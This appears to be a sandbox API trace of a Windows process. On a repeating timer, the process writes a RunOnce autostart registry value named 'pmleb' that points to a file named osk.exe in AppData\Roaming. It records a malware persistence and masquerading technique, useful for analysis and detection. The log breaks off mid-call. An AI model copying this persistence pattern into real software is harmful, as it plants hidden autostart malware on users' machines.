[0092.999] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.013] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.013] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.013] KillTimer (hWnd=0x20280, uIDEvent=0x2221) returned 1 [0093.013] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.013] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.013] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.014] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.014] RegCloseKey (hKey=0x280) returned 0x0 [0093.014] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.014] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.014] SetTimer (hWnd=0x20280, nIDEvent=0x2222, uElapse=0xa, lpTimerFunc=0x0) returned 0x2222 [0093.014] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.028] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.028] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.028] KillTimer (hWnd=0x20280, uIDEvent=0x2222) returned 1 [0093.029] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.029] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.029] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.029] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.030] RegCloseKey (hKey=0x280) returned 0x0 [0093.030] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.030] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.030] SetTimer (hWnd=0x20280, nIDEvent=0x2223, uElapse=0xa, lpTimerFunc=0x0) returned 0x2223 [0093.030] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.044] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.044] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.044] KillTimer (hWnd=0x20280, uIDEvent=0x2223) returned 1 [0093.044] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.045] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.045] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.045] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.045] RegCloseKey (hKey=0x280) returned 0x0 [0093.045] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.045] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.045] SetTimer (hWnd=0x20280, nIDEvent=0x2224, uElapse=0xa, lpTimerFunc=0x0) returned 0x2224 [0093.046] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0093.059] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.059] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.060] KillTimer (hWnd=0x20280, uIDEvent=0x2224) returned 1 [0093.060] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.060] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.060] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.061] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.061] RegCloseKey (hKey=0x280) returned 0x0 [0093.061] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.061] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.061] SetTimer (hWnd=0x20280, nIDEvent=0x2225, uElapse=0xa, lpTimerFunc=0x0) returned 0x2225 [0093.061] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.075] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.075] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.075] KillTimer (hWnd=0x20280, uIDEvent=0x2225) returned 1 [0093.076] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.076] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.076] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.076] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.076] RegCloseKey (hKey=0x280) returned 0x0 [0093.077] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.077] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.077] SetTimer (hWnd=0x20280, nIDEvent=0x2226, uElapse=0xa, lpTimerFunc=0x0) returned 0x2226 [0093.077] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.091] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.091] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.091] KillTimer (hWnd=0x20280, uIDEvent=0x2226) returned 1 [0093.091] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.092] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.092] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.092] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.092] RegCloseKey (hKey=0x280) returned 0x0 [0093.092] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.092] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.092] SetTimer (hWnd=0x20280, nIDEvent=0x2227, uElapse=0xa, lpTimerFunc=0x0) returned 0x2227 [0093.092] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.106] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.106] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.106] KillTimer (hWnd=0x20280, uIDEvent=0x2227) returned 1 [0093.107] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.107] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.107] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.107] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.107] RegCloseKey (hKey=0x280) returned 0x0 [0093.108] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.108] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.108] SetTimer (hWnd=0x20280, nIDEvent=0x2228, uElapse=0xa, lpTimerFunc=0x0) returned 0x2228 [0093.108] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.122] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.122] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.122] KillTimer (hWnd=0x20280, uIDEvent=0x2228) returned 1 [0093.122] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.123] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.123] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.123] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.123] RegCloseKey (hKey=0x280) returned 0x0 [0093.123] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.123] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.123] SetTimer (hWnd=0x20280, nIDEvent=0x2229, uElapse=0xa, lpTimerFunc=0x0) returned 0x2229 [0093.123] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.253] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.254] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.254] KillTimer (hWnd=0x20280, uIDEvent=0x2229) returned 1 [0093.254] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.254] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.255] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.255] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.255] RegCloseKey (hKey=0x280) returned 0x0 [0093.255] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.255] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.255] SetTimer (hWnd=0x20280, nIDEvent=0x222a, uElapse=0xa, lpTimerFunc=0x0) returned 0x222a [0093.255] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.262] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.262] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.263] KillTimer (hWnd=0x20280, 
uIDEvent=0x222a) returned 1 [0093.263] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.263] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.263] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.264] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.264] RegCloseKey (hKey=0x280) returned 0x0 [0093.264] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.264] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.264] SetTimer (hWnd=0x20280, nIDEvent=0x222b, uElapse=0xa, lpTimerFunc=0x0) returned 0x222b [0093.264] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.278] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.278] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.278] KillTimer (hWnd=0x20280, uIDEvent=0x222b) returned 1 [0093.278] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.279] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.279] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.279] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.279] RegCloseKey (hKey=0x280) returned 0x0 [0093.279] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.279] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.280] SetTimer (hWnd=0x20280, nIDEvent=0x222c, uElapse=0xa, lpTimerFunc=0x0) returned 0x222c [0093.280] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.293] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.293] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.294] KillTimer (hWnd=0x20280, uIDEvent=0x222c) returned 1 [0093.294] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.294] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.294] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.294] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.295] RegCloseKey (hKey=0x280) returned 0x0 [0093.295] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.295] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.295] SetTimer (hWnd=0x20280, nIDEvent=0x222d, uElapse=0xa, lpTimerFunc=0x0) returned 0x222d [0093.295] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.309] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.309] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.309] KillTimer (hWnd=0x20280, uIDEvent=0x222d) returned 1 [0093.310] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0093.310] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.310] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.310] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.310] RegCloseKey (hKey=0x280) returned 0x0 [0093.311] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.311] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.311] SetTimer (hWnd=0x20280, nIDEvent=0x222e, uElapse=0xa, lpTimerFunc=0x0) returned 0x222e [0093.311] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.325] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.325] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.325] KillTimer (hWnd=0x20280, uIDEvent=0x222e) returned 1 [0093.325] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.325] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.326] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.326] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.326] RegCloseKey (hKey=0x280) returned 0x0 
[0093.326] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.326] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.326] SetTimer (hWnd=0x20280, nIDEvent=0x222f, uElapse=0xa, lpTimerFunc=0x0) returned 0x222f [0093.326] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.340] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.340] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.341] KillTimer (hWnd=0x20280, uIDEvent=0x222f) returned 1 [0093.341] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.341] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.341] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.342] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.342] RegCloseKey (hKey=0x280) returned 0x0 [0093.342] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.342] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.342] SetTimer (hWnd=0x20280, nIDEvent=0x2230, uElapse=0xa, lpTimerFunc=0x0) returned 0x2230 [0093.342] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.358] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.358] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.359] KillTimer (hWnd=0x20280, uIDEvent=0x2230) returned 1 [0093.359] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.359] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.359] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.360] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.360] RegCloseKey (hKey=0x280) returned 0x0 [0093.360] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.360] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.360] SetTimer (hWnd=0x20280, nIDEvent=0x2231, uElapse=0xa, lpTimerFunc=0x0) returned 0x2231 [0093.360] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.371] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.372] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.372] KillTimer (hWnd=0x20280, uIDEvent=0x2231) returned 1 [0093.372] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.372] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.372] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.373] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.373] RegCloseKey (hKey=0x280) returned 0x0 [0093.373] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.373] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.373] SetTimer (hWnd=0x20280, nIDEvent=0x2232, uElapse=0xa, lpTimerFunc=0x0) returned 0x2232 [0093.373] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.387] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.387] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.387] KillTimer (hWnd=0x20280, uIDEvent=0x2232) returned 1 [0093.387] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.388] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.388] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.388] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.388] RegCloseKey (hKey=0x280) returned 0x0 [0093.388] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.389] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.389] SetTimer (hWnd=0x20280, nIDEvent=0x2233, uElapse=0xa, lpTimerFunc=0x0) returned 0x2233 [0093.389] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.403] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.403] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.403] KillTimer (hWnd=0x20280, uIDEvent=0x2233) returned 1 [0093.404] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.404] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.404] RegCreateKeyExA (in: hKey=0x80000001, 
